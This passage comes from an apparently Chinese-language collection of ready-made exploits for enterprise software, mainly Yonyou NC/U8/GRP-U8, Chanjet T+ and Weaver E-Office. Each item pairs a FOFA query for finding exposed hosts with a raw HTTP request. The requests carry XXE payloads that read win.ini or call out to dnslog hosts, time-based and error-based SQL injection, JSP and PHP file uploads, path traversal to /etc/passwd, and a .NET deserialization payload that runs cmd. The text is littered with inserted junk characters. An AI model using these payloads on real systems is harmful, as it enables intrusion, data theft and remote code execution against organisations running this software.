) U" y3 [3 j2 Y0 w7 d/ o; u- l& u+ OUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
% o( a( ~7 W1 l2 w$ u6 sAccept-Encoding: gzip, deflate! p& B9 Z! p; u j
Accept: */*
- Y' b1 [* m* a' @/ W- w E9 S5 EConnection: close
8 @! o1 A* n- ]! l& I3 yaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA# E) A- S9 I% r% ^( q# A5 ?2 ]
Content-Length: 190
( _! ^4 |& f* o0 h8 p( DContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
2 }0 v3 {' {7 f+ v5 O2 f# u8 A8 e% g/ Y8 w* S
--fd28cb44e829ed1c197ec3bc71748df00 u, u. Q' T( A2 Z( M, i! [! T
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"1 r; c1 H% `; K# ?. } {1 D
3 M; I8 @# h Y<%out.println(1111*1111);%>+ S, f- V5 Y; Z
--fd28cb44e829ed1c197ec3bc71748df0--0 W+ p1 F7 ~5 `2 M. A# m% R- {
: b. s. h5 S8 X' L& F" C# [' Y3 X; _" k9 J3 ^ {) l; a+ [( F
36. 用友NC-Cloud soapFormat XXE: p8 V/ ~6 u/ S
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
7 |7 T1 q8 q$ cPOST /uapws/soapFormat.ajax HTTP/1.1
- A$ D6 M f$ Z0 }% B0 Z \8 fHost: 192.168.40.130:8989
% _& S1 l/ B3 v" |/ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
; ^" u( M+ N) ^% M( C" N6 }& j/ YContent-Length: 263
& D3 B( n6 s H8 e8 O( I' SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' _. ^* a& z* \Accept-Encoding: gzip, deflate$ F2 m- }5 w* N* K% g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# l& |* ?0 y$ A3 g/ B; R! I( P/ p
Connection: close1 ]7 K, G6 t3 g$ B' t0 p
Content-Type: application/x-www-form-urlencoded
1 u4 m; c$ m* G+ a y" I H# K- PUpgrade-Insecure-Requests: 1- N0 ]& {: O" T4 ?# Z5 G
5 k" r' Z9 b, Q$ T0 M
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
1 z- u' X9 \% ?& U2 g3 _9 _, v! d6 o0 J- o! y3 @
' k" A, D+ e+ ]" t7 l% ^
37. 用友NC-Cloud IUpdateService XXE
3 o' K5 z4 E4 T& l# W" yFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
% O+ d5 R# s! H& P2 G% }1 \POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1' W) v g& w1 n# G! _! {
Host: 192.168.40.130:8989/ u3 u5 ]' {, ] C* z- N% a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
: b& I) K7 D4 a3 Q Z! ?Content-Length: 421 ]$ J, W. d8 H% S! W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, M/ T. I7 a$ g, f5 m1 gAccept-Encoding: gzip, deflate
/ J( V3 e% d" u9 v7 O- jAccept-Language: zh-CN,zh;q=0.9
, T4 p. i4 n V" y, j SConnection: close
4 |* t# O% k2 w* F$ gContent-Type: text/xml;charset=UTF-82 B3 M; }3 m$ [6 s1 q+ {; i
SOAPAction: urn:getResult
* ]$ D0 D& M' V- r( \Upgrade-Insecure-Requests: 18 ]5 b5 Y4 r4 L d8 j1 T
; p. Y( g2 G* h8 u8 Q
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">/ a6 V2 l" _ X. a8 n' I0 H
<soapenv:Header/>
$ Y2 W. `8 q$ Q0 D6 T9 ~5 s2 j, @<soapenv:Body>
9 E% h% o s& U" D7 J) `% s<iup:getResult>) G2 Q. j. d% s
<!--type: string--> ~/ F; Y" @/ }9 Z0 o8 M
<iup:string><![CDATA[/ f" A Z8 {5 E5 [ o
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
4 ~: e( ^* [% ^8 v2 A3 V! `- h<xxx/>]]></iup:string>
, k! V9 G. x& a</iup:getResult>* E4 [( F! N! c# Q7 e
</soapenv:Body>* i5 R& l: {+ s
</soapenv:Envelope>' @9 X& ]' A/ R1 }2 t
* ~1 e% n+ W" B& M% I
8 X" K/ g3 [0 J5 t/ s# s1 f0 y& p$ B9 P. W) o# W
38. 用友U8 Cloud smartweb2.RPC.d XXE
0 t& s, I; {5 }/ M- y- E# W0 UFOFA:app="用友-U8-Cloud"
) ^2 n4 x2 T; bPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1% y6 B, E4 L( T% m
Host: 192.168.40.131:8088, G; m. Q9 \8 B" i. k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25, ~) q6 m! t& U+ v9 A8 p3 {6 ?5 }8 [
Content-Length: 260. o! w) W7 m1 D" i# q a x6 p! V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
! t! i ?& [0 t2 s9 Q9 eAccept-Encoding: gzip, deflate
# A) P, h8 {. XAccept-Language: zh-CN,zh;q=0.9. e3 \1 o! L. j' O' s
Connection: close; k( ^, |+ L+ i3 @
Content-Type: application/x-www-form-urlencoded
' r5 W( v3 O. @. S( [' {; P# T; I2 I8 |1 x3 s+ H
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>8 `9 B2 A5 J5 G! n3 _3 Y
( P0 M3 ]* B( v' Z. e( k5 O4 i7 q* Z
39. 用友U8 Cloud RegisterServlet SQL注入8 O4 s, O4 j: ^) d
FOFA:title="u8c"
$ Y) S6 w- W: NPOST /servlet/RegisterServlet HTTP/1.1
- }) Z! G0 l9 o& A0 v" p4 s# XHost: 192.168.86.128:8089' X8 B! z, T/ J4 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
# ^: R2 c0 n+ g8 K& _# N wConnection: close5 B* _: l# y( l! i0 q
Content-Length: 85, |) [( l; j4 u( W7 t2 z( _* Z" f
Accept: */*
+ Z8 I8 w w" V2 j5 rAccept-Language: en% v+ y4 T' B9 M8 {& H
Content-Type: application/x-www-form-urlencoded
$ @6 }: W) h% [X-Forwarded-For: 127.0.0.1, n! b; b$ }) O0 f4 Q
Accept-Encoding: gzip. n, g7 g* @9 H2 W. F: N7 Y
# [5 V3 c+ ], k8 e1 c( ]usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
% E. V d4 n0 K. @+ Z9 U( E' @' J( C6 A" q1 S
4 d$ J! f6 ?3 t1 v2 h- ~, s40. 用友U8-Cloud XChangeServlet XXE2 z2 Q9 ~9 E, n" d8 `1 O+ `2 A
FOFA:app="用友-U8-Cloud"
5 U' n8 j* O. yPOST /service/XChangeServlet HTTP/1.1
u2 v1 r2 n1 m( \+ jHost: x.x.x.x
4 V" g# ^ Y. C) F3 k! T3 G# }User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. K5 q1 [* H% e4 n2 vContent-Type: text/xml8 M9 _/ i; C9 t3 C' X
Connection: close
3 J8 O+ ~3 o# P. w, E/ N8 o( y6 q8 t+ j8 x' q+ `; p' j
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>/ L8 p9 X1 b( ]( S9 w6 b5 P9 O
8 a% b' @8 d+ O; L9 u
3 e4 H# F& D& L* R7 h; z" O& L
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
+ v' Y7 B5 c9 }. oFOFA:app="用友-U8-Cloud"
; X" z v0 `/ R7 t+ gGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.19 g" M2 m5 K9 u& c. D: j4 _
Host:4 w f1 K2 u- A8 Y6 G9 ]) \/ N# l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 d. b0 J- V7 Z5 g) a3 h9 n( l! z
Content-Type: application/json
* o1 q4 j9 }+ p; [. MAccept-Encoding: gzip! |' n* W3 W2 |2 ~# h/ I Z
Connection: close- I1 S+ s' B- v# @: f9 h) }3 p
# G7 k( q5 ]& ]$ x
- m" |+ d# Q% }42. 用友GRP-U8 SmartUpload01 文件上传. v; x& N& Y2 S7 U1 G7 }
FOFA:app="用友-GRP-U8"
6 {* W( x6 s: ^/ t2 a5 }- F0 [POST /u8qx/SmartUpload01.jsp HTTP/1.1
! w8 q- R) _+ B, MHost: x.x.x.x
* o1 D$ s' i$ @2 W0 u( o; }, v! ^' zContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
p. P- \3 f( x* _# \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
* K; T; H" [) c$ h. V1 c9 n/ J( q7 Y
PAYLOAD8 }+ ?2 _$ u, o0 D W+ `
7 P( v9 m. w; a" A$ ]: }
9 s- D) |$ Z1 G0 z# }/ c5 y |http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
' l7 b! r4 m% [/ s$ K/ c" l7 R6 b* X0 o3 i! P* I" A$ f* n
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
- e, j2 l" Z F) K' g% H ^9 cFOFA:app="用友-GRP-U8": f" B6 c0 o! i0 J2 z8 c* _* b
POST /services/userInfoWeb HTTP/1.1% {2 ^. h0 n, A ?; |, h& v
Host: your-ip8 t" Y) V! q% S( C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) t; O6 D l3 ]. X, f0 I" r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 }4 m) g/ S. _3 r! D0 H" Z
Accept-Encoding: gzip, deflate8 W x3 z; {' z3 @: g/ ], R" Y( y
Accept-Language: zh-CN,zh;q=0.9
1 _) w( K# y) N. o# G6 Y& J. kConnection: close. U7 z' R$ ?- j
SOAPAction:; `, q7 s3 T7 Y6 _& J3 ]2 l0 [* h
Content-Type: text/xml;charset=UTF-8( [1 t, d" ~ j9 T% J5 x
3 }$ O8 S& F/ ~$ f3 z D; h3 Y6 ]
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
. k! S7 x3 P6 v; k <soapenv:Header/>
8 m Y9 g! \# y0 H$ U <soapenv:Body> q& \) x: O$ r
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
" |2 |! h% ?0 w5 f: n7 i. `5 H @ <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
& G" a2 ?; D* N" S </ser:getUserNameById># _2 [6 C2 n0 d1 T+ ~- T, T
</soapenv:Body> N) l+ b9 K& j+ W' g8 D
</soapenv:Envelope>
* Y7 V' ~3 e: ^! x" X5 }9 m- U7 C0 d2 k
# O! z7 @+ \8 G- U6 N' x44. 用友GRP-U8 bx_dj_check.jsp SQL注入; G: J5 P* @# ~* ?- U
FOFA:app="用友-GRP-U8"
. l, ]0 L" Y5 R M' x ]; cGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1) i8 b7 Q# v- X( G8 k
Host: your-ip4 w, b# H' p2 _+ a8 l' h' |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
5 i' `1 N' S, @) GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& G2 Y a5 Y) |- \4 C. _Accept-Encoding: gzip, deflate6 A' }/ F& Z: R- U
Accept-Language: zh-CN,zh;q=0.95 x; A* }! h3 G7 J0 Z- {" @
Connection: close: C6 r& u6 ^: j0 d
9 L6 A7 s1 [% R
( L C0 t9 c* Q2 H% J, {- z% e45. 用友GRP-U8 ufgovbank XXE2 |, f! [- W G1 |3 ^
FOFA:app="用友-GRP-U8"4 R% C) \( M3 B$ g* x/ w4 n
POST /ufgovbank HTTP/1.1) O7 d0 C/ P; L% D1 a, w
Host: 192.168.40.130:222& G8 s8 O4 J) B; q( S4 U( E' J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.08 T* k& u) {( Z" o- r* `# W
Connection: close. [2 f7 i8 ?% @! |9 P& o$ e
Content-Length: 1610 V! V8 q6 Q0 i7 t$ Y- a3 d4 Y( q0 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( r% J, @& c OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' T! u% ~( E, d% r- w3 QContent-Type: application/x-www-form-urlencoded
9 J3 e' r7 G( o, rAccept-Encoding: gzip& W( U+ Y% { r" B: g$ D* o4 b. {
& f, R! E7 g8 AreqData=<?xml version="1.0"?>
+ m/ a0 Z0 X/ A6 n( P<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest1 M( P1 h- c* u1 W' h5 u q, ^
, \# p; m- \, q# @; K/ v
! @) c6 K3 U& T4 p' W) U
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. B( j' U: a7 u7 SFOFA:app="用友-GRP-U8"
& x; _9 B+ W* o! ^9 xGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1$ O2 S/ i" g: ] `1 j8 I1 j' F) N3 D
Host: your-ip
4 x) J- @) y* ~- t" ]8 T$ yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36- i* Z8 ~! O; H8 B0 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 \9 p: }0 S, s" ], F" A! d
Accept-Encoding: gzip, deflate6 X2 e" r/ `4 X
Accept-Language: zh-CN,zh;q=0.9 d3 F8 T( k) t+ u9 k: P( m
Connection: close
' X7 ]/ p4 z w9 P& S/ \- K# ]4 P( ]) I1 C
- v# `2 Z5 _0 k47. 用友GRP A++Cloud 政府财务云 任意文件读取+ M1 G5 r; s; `# H! Y0 }) }$ J j
FOFA:body="/pf/portal/login/css/fonts/style.css"
: V+ [! L6 b- ]) hGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.16 U4 d% Z8 x9 q, y: T1 }9 k9 p
Host: x.x.x.x
$ K1 R2 o' N- u. l" H" D4 E# m* UCache-Control: max-age=0# b) ]" F- \0 Q
Upgrade-Insecure-Requests: 1
$ ^+ l( L) p* {# b- s/ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ f! p* T6 h8 e" `/ H8 x# UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ f2 {. S5 ]1 S5 r) _' F
Accept-Encoding: gzip, deflate, br R8 X$ T4 |& J3 W. l% U
Accept-Language: zh-CN,zh;q=0.96 Z% \: ^* T9 V% u/ L; b; z
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT9 B5 `0 f8 a) u
Connection: close) Y6 ?! l: G- i8 Q( y& l) f
- E$ u/ `: o: |- \+ R
+ l$ }5 U; V ]: }) N5 ^. i; K I
/ [& L* |8 q1 l& A48. 用友U8 CRM swfupload 任意文件上传) Q( t ~- H5 Q5 d
FOFA:title="用友U8CRM"8 k* D% i) Y# d( }
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
4 s5 R# j5 K) }1 ~! R- yHost: your-ip3 @8 [4 G$ a+ T/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) r- A q% i5 f& `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 g$ N9 d3 d' e n( J9 |% L+ v kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 o/ |$ f. W" t+ ^* s5 h) e3 D
Accept-Encoding: gzip, deflate+ f K* c" k' f6 l
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668553 ]* \# T* S1 y
------269520967239406871642430066855
5 U" p. W7 K0 kContent-Disposition: form-data; name="file"; filename="s.php"/ f$ @( i, H' K! y. Q9 O+ f- W3 |
1231
* I! C: X* s) Z* F4 ^Content-Type: application/octet-stream
1 S+ \. a& F, ?- S. g------269520967239406871642430066855/ x z/ V: E1 o* e, f
Content-Disposition: form-data; name="upload"
6 H9 o9 y- l; {upload8 V& w; J% T& f4 y# O! W' M
------269520967239406871642430066855--
6 D2 I# g& N- K( P$ V2 Y3 J. x) |% q& d
. h% f8 d. g( Y8 F/ c) t49. 用友U8 CRM系统uploadfile.php接口任意文件上传
- O+ {3 Y2 _2 w M4 J3 J2 cFOFA:body="用友U8CRM"8 n4 J7 p- T( Z) Q. X! r
' r" m. g+ f+ i! s3 A6 `
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.19 W, p( g3 K5 c( o: Q, U" o
Host: x.x.x.x
6 p' l0 L2 y. Q8 w$ ^# V4 Q- D5 J- _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 t9 A% T9 s" D# B1 @" I$ ^' |& h @) Y! U
Content-Length: 329" }! p0 P7 l( e9 i) b9 S! N2 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; Y3 ^+ u' Z% g$ y+ E
Accept-Encoding: gzip, deflate8 z. P- C' I0 F% d- I, ~9 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( E3 s/ g4 v8 \: rConnection: close
; p, ?4 J; z- UContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
; Z4 W' V1 d+ d# e+ e+ j
4 ~& Y w; m6 t6 g2 d-----------------------------vvv3wdayqv3yppdxvn3w$ j- W' h0 R" I1 W+ p# O
Content-Disposition: form-data; name="file"; filename="%s.php "6 X" Q# p0 X: V$ U# V8 Z" S
Content-Type: application/octet-stream. ?, c$ l: g" N; Z7 _- V" M
" h1 _% ?* c! C6 F- Y0 q! B
wersqqmlumloqa3 ^/ B& W F0 [3 H( |6 M( d* _& f8 }
-----------------------------vvv3wdayqv3yppdxvn3w
( L2 D( Q5 \ rContent-Disposition: form-data; name="upload"$ w; [' |/ n0 v6 o
f$ h6 I; M" qupload7 T( N) I7 O) R h* g3 F
-----------------------------vvv3wdayqv3yppdxvn3w--
2 l( r) x; J. C
9 j! b6 B9 q9 ~5 [" {. V
, \9 E: G( D- q) ihttp://x.x.x.x/tmpfile/updB3CB.tmp.php
% `: `8 y( b g6 T) f2 U) ?/ x) P" w" j# b3 g" i/ K, I
50. QDocs Smart School 6.4.1 filterRecords SQL注入
; s( K" K& {% r% E, r0 xFOFA:body="close closebtnmodal"& p" L9 l8 L) {! h |* [1 j5 \
POST /course/filterRecords/ HTTP/1.1
, M6 B' { `4 D7 m& c( UHost: x.x.x.x
( u! a* v$ Q& nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 M5 y$ f1 I1 F) j9 h1 b
Connection: close
- @. D1 u e$ VContent-Length: 224! m3 u, D [; _- f
Accept: */*- h6 l7 s. N8 u3 P8 e- c3 z
Accept-Language: en
4 P8 Y9 u1 ?1 V. N" n7 v' @: g1 H4 IContent-Type: application/x-www-form-urlencoded
9 |6 B6 D8 |: e( u& p5 i# e! cAccept-Encoding: gzip
3 ?# S* F0 |4 f) E @( W9 p! K6 R) c) X/ t* W0 m t
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
" q+ x3 g5 s* ?+ [9 n% ~3 b7 l( q; h7 s$ r0 u8 z
, q3 R) ?+ C$ d
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
! _( o0 C; Q- [1 Q: L2 t+ yFOFA:app="云时空社会化商业ERP系统". o4 c; z! A- b
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
! k5 x& r- r* Q- z2 ?7 rHost: your-ip; g, J" x: J, h
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
5 v) v0 D3 m' S( B7 h$ a. q3 i! tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( `' k" O$ Q8 L; a/ ` w
Accept-Encoding: gzip, deflate) {8 t5 T7 Y- ^5 Q* [+ {8 ~2 l
Accept-Language: zh-CN,zh;q=0.9/ J) A& `9 s6 Y( ]: T% l
Connection: close% d3 e9 x' t: O% J8 |6 e
* p5 d" R! P% H- L% Y: c A' k( u% O
% q F; p' g( a& ~( r3 ^
52. 泛微E-Office json_common.php sql注入3 g3 q0 ^3 q9 @3 N5 S! ~; V
FOFA:app="泛微-EOffice"# Y4 b5 m) a7 `# i! ?5 Z$ q
POST /building/json_common.php HTTP/1.13 _+ D b9 {5 f& i, I0 H
Host: 192.168.86.128:8097
( G( V8 W1 t& NUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& j! L- q! r3 {Connection: close$ }( J( K A+ w, {! U* M" c
Content-Length: 87* {4 ^/ h8 P% T. w& _% S- B
Accept: */*
9 a1 I, C7 c1 L; D, P* a8 lAccept-Language: en$ V: h5 e3 z( \' e7 ~
Content-Type: application/x-www-form-urlencoded5 X$ D l: a0 {# \: C( j7 W
Accept-Encoding: gzip
' A" A1 x- \8 [9 @6 A
9 q2 r+ `( f- k3 R7 E/ ttfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
9 e' Y: [# e2 [$ e& v
- e7 l0 m/ |& X9 ^8 q" d6 S2 N# f, X( R1 q' ?. q, O, u
53. 迪普 DPTech VPN Service 任意文件上传6 T( D, I/ q5 I% g9 G
FOFA:app="DPtech-SSLVPN"
& {4 ]! L8 X9 k1 V/ a! [( L4 Y: ]. U/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd5 C5 ]$ S6 `1 T# e1 D- y5 o
5 ^9 F1 d7 L6 W4 e
* j7 M0 c. [' O1 `, i* a6 j54. 畅捷通T+ getstorewarehousebystore 远程代码执行
r, y6 R" l9 R+ G! @$ E: g2 Z5 eFOFA:app="畅捷通-TPlus"
# s) [* r! M% x& h9 ~第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
9 |7 n5 L' q) p1 k! W; z"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"8 U, Q' b5 p2 B) C- R M* h
9 y9 r9 q1 Y& f6 t+ n
% d* F0 d8 v9 |6 c0 {3 S3 Q5 E$ n& Q# \完整数据包3 I9 k+ }/ O+ e% u/ v3 J
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
9 }. s3 m2 n- MHost: x.x.x.x
4 r! _5 X* }5 D6 a: a2 pUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
) I! ?+ }" c3 i$ ?* IContent-Length: 593
* A' f. a3 R0 q- T; k. I; Z6 X" M7 i6 a
{4 E5 u$ |4 z9 A' i* T( p1 |7 E
"storeID":{7 y2 U( c H' r
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
0 P( d+ m( M, h p& V1 `2 G "MethodName":"Start",
9 z" m, b& T1 x! L! V; b' _8 L "ObjectInstance":{# u7 u5 p$ F( T2 K9 q& h, N
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 o3 A7 p& {* W+ o& u! p) Z: ?) ]
"StartInfo":{
& B4 L' J- h& _ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 l) U6 P; D' E$ q' a" b "FileName":"cmd",
1 E. ?% T, Y6 a "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"0 M% w4 Y' I- ?5 ~ ]7 E
}: t( g" ~. Y% W* d) Y: U3 g4 g9 a
}
* ?$ ~. z0 s9 u. c1 k }$ @+ V) m6 M( r) ^5 X
}9 u* u6 } `' a7 E; Q
f# p& Y' @6 |8 T: K# d1 \% O; \% `$ l# k
第二步,访问如下url/ |6 Z7 [. N. H' C6 |( p) G, v8 i
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt$ F, K c4 c+ u( x% u
/ n( \9 n7 Y, u: z5 k: Q
, [0 p2 n, M3 ^55. 畅捷通T+ getdecallusers信息泄露' @0 P( F5 z( ]6 k, S3 S" M0 Y5 o
FOFA:app="畅捷通-TPlus"
; H9 @7 Q- e! z' E' q& n/ u第一步,通过7 b& i7 D& G7 \1 J
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie ^1 T# x5 s5 k" J! r. M$ n/ @
第二步,利用获取到的Cookie请求
$ M: k* o2 I* K i# P; f( K/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
" x- A( U- H" A! ]( a [* p" ]( R) T
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
& ], | A6 \+ V3 q6 s" XFOFA: app="畅捷通-TPlus"
1 P* G. R7 S/ t: I2 ~9 k* MPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
: @! _1 V9 a6 A' T' F* m/ _Host: x.x.x.x
